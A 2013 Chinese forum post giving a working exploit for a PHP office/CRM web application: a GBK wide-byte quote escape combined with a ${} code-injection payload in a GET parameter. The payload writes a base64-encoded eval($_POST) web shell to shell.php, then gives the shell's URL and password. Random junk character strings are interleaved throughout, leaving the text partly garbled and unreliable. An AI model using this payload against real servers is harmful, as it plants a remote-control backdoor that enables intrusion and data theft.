此程序通篇的gbk编码是他的硬伤, 基本上80%的SQL语句都能控制, 但是由于在进入数据库的时候检测了select和union, 而且此程序加密方式也很蛋疼, 所以注入方面就不考虑了.8 M/ n, x$ |8 n" X
, W) C7 _( |9 \" d v
; s9 [8 n0 f/ G) U/ DEXP:0 E, E: X5 ?7 c; R, h
! ^! C' v7 h3 d( M第一步: [GET]http://site/general/crm/studio/modules/EntityRelease/release.php?entity_name=1%d5'%20or%20sys_function.FUNC_ID=1%23%20${%20fputs(fopen(base64_decode(c2hlbGwucGhw),w),base64_decode(PD9waHAgQGV2YWwoJF9QT1NUW2NdKTsgPz5vaw))}8 L4 Q) T. d1 X5 Y o, ^+ r9 r0 z
4 j0 Q0 E" Q8 q第二步: [GET]http://site/general/email/index.php7 n) @( J3 ?. S7 }9 _
7 E0 `; X; w4 j% R2 }) l
SHELL: http://site/general/email/shell.php 密码C( W( h0 J x8 `. `) J
3 i+ @; J: m$ h2 e. }1 x0 w * P# c8 n, i U2 X% G3 ^3 R
此程序写的非常乱, 不知道是因为解密后的原因还是程序员本身就这样写的, 还有几处不需要登录的通杀getshell, 这里就不发了, 危害大了不好% N$ n* u' N! `# G9 ^( s
v/ Y) U& F0 q9 j$ c0 A0 B有心的同学可以自己读读, 很容易就发现的 o(∩_∩)o ~~
+ z2 J: a1 A: ] w2 T- W1 p' q: u X' s, V) h U8 V. t
+ M$ k! t+ f; k) g! b' W
|
发表于 2013-2-4 16:19:29
收藏
支持
反对